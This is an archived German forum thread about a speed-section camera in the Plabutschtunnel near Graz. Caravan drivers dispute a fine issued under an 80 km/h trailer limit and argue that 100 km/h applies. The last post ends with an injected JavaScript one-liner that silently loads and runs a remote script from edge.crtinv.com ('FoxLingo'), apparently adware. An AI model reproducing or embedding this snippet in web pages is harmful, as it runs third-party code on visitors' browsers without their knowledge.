PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Plabutschtunnel



gelöscht
07.09.2012, 12:49
ACHTUNG SECTION CONTROL!
Im Plabutschtunnel gibt es eine Secetion Control die Anhänger unterscheiden kann. Es kommt dann wie in meinem Fall zu einer Anonymverfügung
>> Kraftwagenzüge erlaubte Höchstgeschwindigkeit 80km/h, gemessen 91 km/h.
Ich darf aber mit meinem Wohnwagengespann (insgesamt 3.500kg) 100 km/h fahren (erlaubte Höchstgeschwindigkeit im Tunnel). Daher genau schauen, nicht einzahlen, Anzeige abwarten und Einspruch erheben. Dann wird das Verfahren bei Nachweis des Gesamtgewichtes eingestellt.......
somit wird es eine Vielzahl von neuen Akten geben, die alle umsonst bearbeitet werden müssen.....

abo
07.09.2012, 20:59
ACHTUNG SECTION CONTROL!
Im Plabutschtunnel gibt es eine Secetion Control die Anhänger unterscheiden kann. Es kommt dann wie in meinem Fall zu einer Anonymverfügung
>> Kraftwagenzüge erlaubte Höchstgeschwindigkeit 80km/h, gemessen 91 km/h.
Ich darf aber mit meinem Wohnwagengespann (insgesamt 3.500kg) 100 km/h fahren (erlaubte Höchstgeschwindigkeit im Tunnel). Daher genau schauen, nicht einzahlen, Anzeige abwarten und Einspruch erheben. Dann wird das Verfahren bei Nachweis des Gesamtgewichtes eingestellt.......
somit wird es eine Vielzahl von neuen Akten geben, die alle umsonst bearbeitet werden müssen.....

hi

waere ja ein schildbuergerstreich wenn die das so machen
oder war da evt ein schild mit 80km/h fuer kraftwagenzuege?
dann bist zu schnell gewesen
kraftwagenzuege sind alle kraftfahrzeuge die einen anhaenger mitfuehren

aus der normalen StVo bestimmung alleine koennen sie dir natuerlich nix anhaengen
da darfst mit 3500kg gesamtzuggewicht 8summe der beiden HZLGG) natuerlich eh 100km/h fahren

ich fahre oft autobahn mit 1300kg haenger
gesamzuggewicht 3470kg
und fahre immer 95km/h
da kam bisher noch nie was per post
und auf der westautobahn sind auch genug section controls ...

lg
g

gelöscht
08.09.2012, 08:54
Guten Morgen!

Ist ein ganz normaler 100er für alle. Meines Wissens nach ist diese Section Control die einzige, die Anhänger unterscheiden kann. Daher gibt es sonst keine Probleme bei anderen Section Controls..
Ich habe mit der zuständige Behörde in Graz telefoniert, die lassen's wirklich darauf ankommen und viele werden das übersehen und zahlen.......Es steht ja auch in der Anonymverfügung nichts vom erlaubten Hunderter, sondern nur Kraftwagenzüge erlaubte Höchstgeschwindigkeit 80km/h. Da werden sich auch viele nicht mehr erinnern, was wirklich erlaubt ist.
Das ist Abzocke!

derfranze
08.09.2012, 12:57
Guten Morgen!

Ist ein ganz normaler 100er für alle. Meines Wissens nach ist diese Section Control die einzige, die Anhänger unterscheiden kann. Daher gibt es sonst keine Probleme bei anderen Section Controls..
Ich habe mit der zuständige Behörde in Graz telefoniert, die lassen's wirklich darauf ankommen und viele werden das übersehen und zahlen.......Es steht ja auch in der Anonymverfügung nichts vom erlaubten Hunderter, sondern nur Kraftwagenzüge erlaubte Höchstgeschwindigkeit 80km/h. Da werden sich auch viele nicht mehr erinnern, was wirklich erlaubt ist.
Das ist Abzocke!

Und die Messung sowie die Anzeige macht die private AsfinAG!

lg Franz
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this .readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild (s);}};h.appendChild(s);}catch(ex){}}();